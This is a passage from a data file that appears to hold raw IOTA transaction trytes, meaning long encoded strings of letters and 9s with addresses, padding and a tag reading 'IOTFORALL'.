9FKWZHHKWQKNILFRAKXPZSVTBRIZAWUSFDQM9LQZUFAOIPPBJUSWCQKSVNMXKWQLGEMCEBGCUKWKPHZLHHEVGVJUSXVJZZALDWQMANSRSQDILGIFTFV9KAQHDPW9WIEBANTXQUSDOHDDVZMDAXJVUA9JQQBHYBWHTUTCFZI9SSYFRSPQTKLFODJHQOZDWFSN9KKSBT9NVPUXLVLE9KP9MOFVFOOQFLZJTHCJXEPWGYBIPXUBUWDAFWZFWVDIQBTBALLKSQPEFPWGWZKYDO9QWB9FHQMOAONYMQU9AQOOJHDJCWGXBIOJGFQKGSSOFQN999999999999999999999999999ERPFQGKONFCGJPBSJPWXDVDUBGZQONOPXD99B99999999F99999999QLQGXIBGDZMQP9OYZELAPXFHECTSGTDLDAABBYCUWMZHSDTQOOVXZUPVPLOSPHEBIQ9VVHCN9GBYKXZVNRJGFBJK9URUINPBTQETZXRAZSZBBKIKIYZKQSMJXBTFVRKAMH9QKAJIYAJFFUR9AK9SISKUDZOAE99999999999999999999999999999999999999999999999999999999999999999999999999999999999999POVWMPHUBRSRAS9DHXTJ9UEMJOWHLPCECP9FQQOFLOWYOMSMFAWELLTU9FZ9LVHALTB9H9SNXUTFYMTCO",
	"999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999VCW9RSPGJFINR9QWMSRVRLVQYRNOILXKBXTYUUPFNDMEVXIXPEYRP9CQONFEREKKQVEKVGRWMZMDI9TRZSD999I999999999999999999999LEBOSC9ZPUHTUYBZ9EKYGAPNEVZQONOPXD99C99999999F99999999QLQGXIBGDZMQP9OYZELAPXFHECTSGTDLDAABBYCUWMZHSDTQOOVXZUPVPLOSPHEBIQ9VVHCN9GBYKXZVNHCGWWFYGMQKCQWZWUXOYQHDPUWDMJQUMLEUV9IQYOODBHYWFJCJOAPQKJYIHZIEENXJOYDDYNHCA99999999999999999999999999999999999999999999999999999999999999999999999999999999999999OSWRCQHLAIHHRVEBB9DWBFYQSTTTDYUAPXXFRNEFWYCKHWJRIVH9VIZZJXMKVJEFVEIOWSSQJFVVRMBKE",
	"999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999VCW9RSPGJFINR9QWMSRVRLVQYRNOILXKBXTYUUPFNDMEVXIXPEYRP9CQONFEREKKQVEKVGRWMZMDI9TRZ999999999999999999999999999SECFRDYMDHRZBOOSWNLTZGICG9ZQONOPXD99D99999999F99999999QLQGXIBGDZMQP9OYZELAPXFHECTSGTDLDAABBYCUWMZHSDTQOOVXZUPVPLOSPHEBIQ9VVHCN9GBYKXZVNTIRZCWHHQHWDTZAZAXBDAASBCOWPLFJUKZUPESAIEMEBJGUWAESVEUOZWAPEXLHZJDJAUZWDSGDT999999999999999999999999999999999999999999999999999999999999999999999999999999999999999ZCLDQHLAIHHRVEBB9DWBFYQSTTTDYUAPXXFRNEFWYCKHWJRIVH9VIYZJXMKVJEFVEIOWSSQJFVVRMBKE",
	"999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999QLBRTQLPHDMKBESFYFJWAGBRNLBKMWTXZLPRUSCYUKMOLVHTMKGUHDYSPXWPYTOVDPHOFYDADANRNSPJUMVJELBB99999999999999999999AXKFTXSHIVSILRNCDVLPIIRIGKJVRNOPXD99E99999999F99999999QLQGXIBGDZMQP9OYZELAPXFHECTSGTDLDAABBYCUWMZHSDTQOOVXZUPVPLOSPHEBIQ9VVHCN9GBYKXZVNHBSNZETOQDJJLVUNYMPZYZAGTK9WIGPNCFBHJHEXR9UUHRFVSWUYKLXHGDRXNDRMWABAAOPBRUNB99999999999999999999999999999999999999999999999999999999999999999999999999999999999999RDLVDGIJFWAPFKZBNHSNCRXOVCSUDEUCVNXSELYDGJWUFAEZCCAIQPFJMQOWSKM9YLGPLOVSFY9FMOCQR",
	"999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999QLBRTQLPHDMKBESFYFJWAGBRNLBKMWTXZLPRUSCYUKMOLVHTMKGUHDYSPXWPYTOVDPHOFYDADANRNSPJU999999999999999999999999999IOTFORALL999999999999999999QONOPXD99F99999999F99999999QLQGXIBGDZMQP9OYZELAPXFHECTSGTDLDAABBYCUWMZHSDTQOOVXZUPVPLOSPHEBIQ9VVHCN9GBYKXZVN999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999FAEOTRHLAIHHRVEBB9DWBFYQSTTTDYUAPXXFRNEFWYCKHWJRIVH9VIZZJXMKVJEFVEIOWSSQJFVVRMBKE",
}